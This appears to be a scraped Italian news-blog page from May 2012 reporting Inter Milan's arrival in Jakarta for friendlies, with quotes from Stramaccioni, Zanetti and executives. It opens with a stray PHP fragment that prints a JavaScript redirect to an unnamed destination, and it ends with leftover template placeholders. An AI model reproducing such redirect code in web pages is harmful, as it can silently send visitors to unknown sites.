location.href='". $red ."';"; exit(); } ?> Notizie 24 News: Inter alla conquista dell'Indonesia Strama: "Teniamo all'immagine"

Ads 468x60px

Random Post

Template Updates

mercoledì 23 maggio 2012

Inter alla conquista dell'Indonesia Strama: "Teniamo all'immagine"


Accoglienza calorosissima per la squadra allo sbarco a Giacarta. Il tecnico: "Nessun esame per Coutinho". Zanetti: "Palacio? Aspettiamo l’ufficialità per abbracciarlo". L'ad Paolillo: "Presto costruiremo qui una scuola calcio"

"L’Inter è orgogliosa di essere in Indonesia e vuole fare del suo meglio non tanto come risultato nelle due amichevoli che ci attendono (domani e sabato contro rispettivamente All Stars del campionato e nazionale indonesiana, ndr) quanto a livello di immagine. Lo stesso presidente Moratti è stato il primo a volere con forza questa tournée". Il desiderio di Andrea Stramaccioni, appena sbarcato a Giacarta, non sarà però facilmente compatibile con l’assalto cui la squadra è stata sottoposta sin dallo sbarco del volo che, via Singapore, l’ha portata nella capitale quando in Italia era l’alba. Qualche migliaio di tifosi ha infatti invaso lo scalo a furia di slogan e cori. Il più gettonato? "Chi non salta rossonero è".







ACCOGLIENZA — In questo contesto, con centinaia di cronisti e fotografi locali iper eccitati per l’arrivo dei nerazzurri, diventa difficile parlare di attualità anche nella conferenza stampa di benvenuto. "Le due gare non saranno un test per Coutinho - spiega subito Strama a proposito del giocatore più atteso dopo gli ottimi mesi con l’Espanyol -. Lui ha già dimostrato il suo valore nell’Inter e lo ha confermato nella Liga. Palacio? Non mi risulta che il suo arrivo sia ufficiale, quindi non ne parlo. Ma so per certo che Moratti ha le idee chiare su come far tornare al vertice la squadra e so che i dirigenti stanno facendo un ottimo lavoro. A nessuno piace vedere l’Inter fuori dalla Champions, ma siamo comunque in Europa".
Preziosi ha annunciato ieri che Rodrigo Palacio è dell'Inter. Ansa
Preziosi ha annunciato ieri che Rodrigo Palacio è dell'Inter. Ansa
BENVENUTO PALACIO— Di Palacio dice qualcosina Javier Zanetti: "Lo conosco bene, è un grande e lo ha dimostrato al Genoa. Aspettiamo l’ufficialità per abbracciarlo". Il capitano spiega di essere "felice di conoscere questa terra piena di interisti. Vogliamo che siano ancora più orgogliosi di noi, poi ricaricheremo le pile prima di prepararci al meglio per una stagione che dovrà essere per forza di cose diversa da quella appena conclusa". Al suo fianco i capi delegazione Ernesto Paolillo e Bedi Moratti. L’ad ringrazia per l’accoglienza e annuncia: "Vogliamo intensificare il legame con l’Indonesia, al di là degli aspetti commerciali che potrebbero anche portarci qualche sponsorizzazione locale. Presto costruiremo qui una scuola calcio". Qualche cronista impreparato chiede invece alla sorella del presidente da quanto è all’Inter. Lei non si scompone e spiega: "Da una vita, visto che era di mio padre. E poi l’Inter è una fede". Applausi in sala.
PROGRAMMA — Dopo la conferenza stampa di presentazione del tour e il pranzo, per i nerazzurri un po' di riposo. L'appuntamento è per le ore 17.30 al "Gelora Bung Karno Stadium", per il primo allenamento, alla vigilia dell'amichevole in cui l'Inter affronterà la selezione composta da giocatori U23 indonesiani e top player del campionato locale. Questa e l'altra amichevole saranno trasmesse in diretta ed esclusiva da Inter Channel, in chiaro per gli abbonati di Sky.

0 commenti:

Posta un commento

 

Sample text

Sample Text

Sample Text